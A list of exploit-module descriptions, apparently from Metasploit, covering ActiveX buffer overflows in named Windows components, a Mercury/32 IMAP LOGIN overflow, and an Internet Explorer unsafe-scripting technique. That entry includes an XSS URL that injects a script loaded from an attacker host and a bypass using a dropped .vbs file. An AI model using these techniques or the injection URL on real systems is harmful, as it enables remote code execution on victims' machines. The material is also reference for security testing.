This module allows attackers to execute code via an unsafe method in Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0).
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the 'HTMLURL' parameter an attacker can execute arbitrary code.
The vulnerability allows an attacker to include files from a remote server, potentially leading to remote code execution or information disclosure.
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the "target-frame" parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability.
This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing with Administrator privileges. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.
This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the 'ExtractIptc()' property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.
This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows JavaScript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist. When set via domain policy, the most common registry entry to modify is HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates a JavaScript/HTML hybrid that will render correctly either via a direct GET http://msf-server/ or as a JavaScript include, such as in: http://intranet-server/xss.asp?id="%3E%3Cscript%20src=http://10.10.10.10/ie_unsafe_script.js>%3C/script%3E.
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).